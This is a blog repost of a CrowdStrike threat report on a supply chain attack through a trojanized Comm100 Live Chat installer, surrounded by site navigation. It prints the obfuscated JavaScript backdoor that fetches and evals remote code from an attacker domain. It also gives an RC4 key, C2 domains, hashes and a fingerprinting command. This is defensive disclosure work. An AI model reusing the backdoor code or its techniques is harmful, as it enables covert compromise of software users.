Membership
Join as an Organization
Enterprises
Solution Providers
Contact Us
Current Members
Initiatives & Partnerships
AI Safety Initiative
CxO Trust
Zero Trust Advancement Center
Trusted Cloud Providers
Trusted Cloud Consultant
Other Opportunities
Event Sponsorships
Join as Individual
Chapters
Circle Community Forum
Research Working Groups
Volunteer Opportunities
STAR Program
STAR Home
STAR Registry
Submit to Registry
Provide Feedback
Certified STAR Auditors
STAR Enabled Solutions
Stay compliant in the cloud
CCAK Training
STAR Lead Auditor Training
Training for Government Agencies
Governance, Risk & Compliance Tools
Cloud Controls Matrix (CCM)
Consensus Assessment Initiative Questionnaire (CAIQ)
EU Cloud Code of Conduct
STAR Level 1
At level one organizations submit a self-assessment.
View companies at level one
Learn about level one
STAR Level 2
At level two organizations earn a certification or third-party attestation.
View companies at level two
Learn about level two
Certificates & Training
Online Platform
Knowledge Center
CSA Exams
Events
Learn and network while you earn CPE credits.
Virtual Events & Webinars
Event Sponsorships
Certificates
Certificate of Cloud Security Knowledge (CCSK)
Certificate of Cloud Auditing Knowledge (CCAK)
Certificate of Competence in Zero Trust (CCZT)
Digital Badges
Trainings
Zero Trust Training (ZTT)
Cloud Infrastructure Security Training
STAR Lead Auditor Training
Advanced Cloud Security Practitioner (ACSP) Training
CCSK Train the Trainer
Training Network
Become an Instructor
Become a Training Partner
Specialized Training Options
Train my entire team
Training for Government Agencies
Research
CSA Research
Latest Research
Working Groups
Open Peer Reviews
Research Topics
Strategic Initiatives
AI Safety Initiative
Zero Trust Advancement Center
CxO Trust
Trusted Cloud Consultant
FinCloud Security
Thought Leadership
CloudBytes Webinars
Blog
Getting Started with CSA Research
Cloud security best practices
Assess your cloud compliance
Security questionnaire for vendors
Top threats to cloud computing
Awards & Recognition
Juanita Koilpillai Awards
Research Fellows
Critical Topics
AI Safety Initiative
AI Technology and Risk
AI Governance & Compliance
AI Controls
AI Organizational Responsibilities
Enterprise Architecture
Blockchain
Zero Trust
DevSecOps
Top Threats
Membership
Join as an Organization
Enterprises
Solution Providers
Contact Us
Current Members
Initiatives & Partnerships
AI Safety Initiative
CxO Trust
Zero Trust Advancement Center
Trusted Cloud Providers
Trusted Cloud Consultant
Other Opportunities
Event Sponsorships
Join as Individual
Chapters
Circle Community Forum
Research Working Groups
Volunteer Opportunities
STAR Program
STAR Home
STAR Registry
Submit to Registry
Provide Feedback
Certified STAR Auditors
STAR Enabled Solutions
Stay compliant in the cloud
CCAK Training
STAR Lead Auditor Training
Training for Government Agencies
Governance, Risk & Compliance Tools
Cloud Controls Matrix (CCM)
Consensus Assessment Initiative Questionnaire (CAIQ)
EU Cloud Code of Conduct
STAR Level 1
At level one organizations submit a self-assessment.
View companies at level one
Learn about level one
STAR Level 2
At level two organizations earn a certification or third-party attestation.
View companies at level two
Learn about level two
Certificates & Training
Online Platform
Knowledge Center
CSA Exams
Events
Learn and network while you earn CPE credits.
Virtual Events & Webinars
Event Sponsorships
Certificates
Certificate of Cloud Security Knowledge (CCSK)
Certificate of Cloud Auditing Knowledge (CCAK)
Certificate of Competence in Zero Trust (CCZT)
Digital Badges
Trainings
Zero Trust Training (ZTT)
Cloud Infrastructure Security Training
STAR Lead Auditor Training
Advanced Cloud Security Practitioner (ACSP) Training
CCSK Train the Trainer
Training Network
Become an Instructor
Become a Training Partner
Specialized Training Options
Train my entire team
Training for Government Agencies
Research
CSA Research
Latest Research
Working Groups
Open Peer Reviews
Research Topics
Strategic Initiatives
AI Safety Initiative
Zero Trust Advancement Center
CxO Trust
Trusted Cloud Consultant
FinCloud Security
Thought Leadership
CloudBytes Webinars
Blog
Getting Started with CSA Research
Cloud security best practices
Assess your cloud compliance
Security questionnaire for vendors
Top threats to cloud computing
Awards & Recognition
Juanita Koilpillai Awards
Research Fellows
Critical Topics
AI Safety Initiative
AI Technology and Risk
AI Governance & Compliance
AI Controls
AI Organizational Responsibilities
Enterprise Architecture
Blockchain
Zero Trust
DevSecOps
Top Threats
Cloud 101CircleEventsBlog
Register for CSA’s free Virtual Cloud Trust Summit to tackle enterprise challenges in cloud assurance.

Supply Chain Attack via a Trojanized Comm100 Chat Installer

Home
Industry Insights
Supply Chain Attack via a Trojanized Comm100 Chat Installer

Blog Article Published: 11/02/2022

Originally published by CrowdStrike.

  • Leveraging a combination of advanced machine learning and artificial intelligence, a new supply chain attack was identified during the installation of a chat-based customer engagement platform.
  • The supply chain attack involved a trojanized installer for the Comm100 Live Chat application being deployed.
  • Malware was delivered via a signed Comm100 installer that could be downloaded from the company’s website as recently as the morning of September 29, 2022.
  • With moderate confidence, the actor responsible for this activity likely has a China nexus.
  • Based on responsible disclosure, Comm100 has released an updated installer (10.0.9) that can be downloaded here.

Applying a combination of advanced machine learning (ML), artificial intelligence (AI) and deep analytics across the trillions of security events captured, a leading security company identified a new supply chain attack pattern during the installation of a chat based customer engagement platform.

The company confirmed that the supply chain attack involved a trojanized installer for the Comm100 Live Chat application. This attack occurred from at least September 27, 2022 through the morning of September 29, 2022. The trojanized file was identified at organizations in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe.

Attack Details

Malware is delivered via a signed Comm100 installer that was downloadable from the company’s website. The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate.

The security company confirmed that the Microsoft Windows 7+ desktop agent hosted at https[:]//dash11.comm100[.]io/livechat/electron/10000/Comm100LiveChat-Setup-win.exe that was available until the morning of September 29 was a trojanized installer. Comm100 has since released an updated installer (10.0.9).

This installer (SHA256 hash: ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86) is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive.

(function(){if(!(typeof Buffer==="undefined")){require("http").get((function(){let b=Buffer.from('681c6818220d2243335a74157819630c620374077510600c6d143a59365b74187107620a6f03735c3f503c50355622','hex');
for(i=b.length-1;i>0;i--){b[i]=b[i]^b[i-1]}return b.toString();})(),function(resp){let data="";resp.on("data",chunk=>{data+=chunk;});resp.on("end",()=>{try{eval(data)}catch(e){}});resp.on("error",err=>{})}).on("error",err=>{})}})()

Figure 1. Initial JS Backdoor in main.js

The backdoor downloads and executes a second-stage script from URL http[:]//api.amazonawsreplay[.]com/livehelp/collect.

The second-stage script consists of obfuscated JS containing a backdoor that gathers host information before providing the actor with remote shell functionality by spawning a new instance of cmd.exe.

The script also uses the command-and-control (C2) domain api.amazonawsreplay[.]com.

As part of likely follow-on activity, the actor installed additional malicious files on the affected host, including a malicious loader DLL named MidlrtMd.dll executed by a legitimate copy of a Microsoft Metadata Merge Utility (mdmerge.exe) binary via DLL search-order hijacking. The loader DLL decrypts a payload file named license using a customized variant of RC4 encryption with the hard-coded key U9ELetx8eMR8pd5koFamoOyuf9tTRTPG.

The decrypted payload consists of shellcode that is executed in memory and injects an embedded payload into a new instance of notepad.exe. The injected payload connects to the malicious C2 domain api.microsoftfileapis[.]com, which resolved to the IP address 8.219.167[.]156 at the time of the incident.

Based on the company’s responsible disclosure, Comm100 has released an updated installer. Impacted Comm100 customers can download the latest exe version (10.0.9) here.

Comm100 further indicated it was performing a root cause analysis to obtain additional information.

Assessment

The payload delivered in this supply chain attack differs from payloads identified in previous incidents related to the same actor, targeting online gambling entities in Asia. Additionally, the recent activity differs from activity targeting online gambling in both the target scope and the supply chain attack mechanism delivering a trojanized app via Comm100’s website.

Despite these differences, the company assesses that the actor responsible for previously identified online gambling targeting is also likely responsible for these recent incidents. This assessment is made with moderate confidence based on the following factors:

  • The use of chat software to deliver malware
  • The use of the Microsoft Metadata Merge Utility binary to load a malicious DLL named MidlrtMd.dll
  • C2 domain-naming convention using Microsoft and Amazon-themed domains along with api. subdomains
  • C2 domains hosted on Alibaba infrastructure

Furthermore, with moderate confidence, this actor likely has a China nexus. This assessment is based on the presence of Chinese-language comments in the malware, aforementioned tactics, techniques and procedures (TTPs), and the connection to the targeting of online gambling entities in East and Southeast Asia — a previously established area of focus for China-nexus targeted intrusion actors.

Intelligence Confidence Assessment

High Confidence: Judgments are based on high-quality information from multiple sources. High confidence in the quality and quantity of source information supporting a judgment does not imply that that assessment is an absolute certainty or fact. The judgment still has a marginal probability of being inaccurate.

Moderate Confidence: Judgments are based on information that is credibly sourced and plausible, but not of sufficient quantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to express that judgments carry an increased probability of being incorrect until more information is available or corroborated.

Low Confidence: Judgments are made where the credibility of the source is uncertain, the information is too fragmented or poorly corroborated enough to make solid analytic inferences, or the reliability of the source is untested. Further information is needed for corroboration of the information or to fill known intelligence gaps.

Indicators

SHA256 Hash

Comm100 File Version

6f0fae95f5637710d1464b42ba49f9533443181262f78805d3ff13bea3b8fd45

(This file contains the same backdoor, but it has not been observed in the wild)

10.0.72

ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86

10.0.8

Table 1. Trojanized Comm100 Application Executables

Filename

SHA256 Hash

Description

C:\ProgramData\Cisco Core\CoreConnect.exe

ac9f2ae9de5126691b9391c990f9d4f1c25afa912fbfda2d4abfe9f9057bdd8c

Legitimate mdmerge.exe executable

C:\ProgramData\Cisco Core\MidlrtMd.dll

6194d57fc3bc35acf9365b764338adefacecfacf5955b87ad6a5b753fb6081f8

Malicious loader DLL

C:\ProgramData\Cisco Core\license

c930a28878a5dd49f7c8856473ff452ddbdab8099acd6900047d9b3c6e88edca

Encrypted payload configured with C2 domain api.microsoftfileapis[.]com

Table 2. Observed Implant Likely Deployed by the Actor

Network Indicators

Description

http[:]//api.amazonawsreplay[.]com/collect_log

JS backdoor logging URL

http[:]//api.amazonawsreplay[.]com

JS backdoor C2

http[:]//api.amazonawsreplay[.]com/livehelp/init

JS backdoor C2

http[:]//api.microsoftfileapis[.]com

Encrypted payload C2 host

https[:]//selfhelp[.]windowstearns[.]com

Related encrypted payload C2 host

http[:]//api.amazonawsreplay[.]com/livehelp/collect

Staging URL for JS backdoor

Table 3. Network Indicators Related to Activity Described in this Alert

Command Line

Description

reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v ProductId

Used in the JS backdoor to compute a MD5 victim hash

Table 4. Command-Line Indicators Related to Activity Described in this Alert

Artificial IntelligenceThreat Intelligence

Share this content on your favorite social network today!

Latest from CSA
AI Summit at RSAC 2024
The State of AI and Security Survey Report
Data Resiliency Survey 2024
Trending This Week
#1 What is the Cloud Controls Matrix (CCM)?
#2 Zero Trust and AI: Better Together
#3 Test Accounts: Another Compliance Risk
#4 AI Safety vs. AI Security: Navigating the Commonality and Differences
#5 Is PQC Broken Already? Implications of the Successful Break of a NIST Finalist
Level up with Cloud Infrastructure Security Training
Related Articles:
Cloud Security Alliance (CSA) AI Summit at RSAC to Deliver Critical Tools to Help Meet Rapidly Evolving Demands of AI

Published: 04/17/2024

The Data Security Risks of Adopting Copilot for Microsoft 365

Published: 04/16/2024

Cantwell Proposes Legislation to Create a Blueprint for AI Innovation and Security

Published: 04/15/2024

Sealing Pandora's Box - The Urgent Need for Responsible AI Governance

Published: 04/12/2024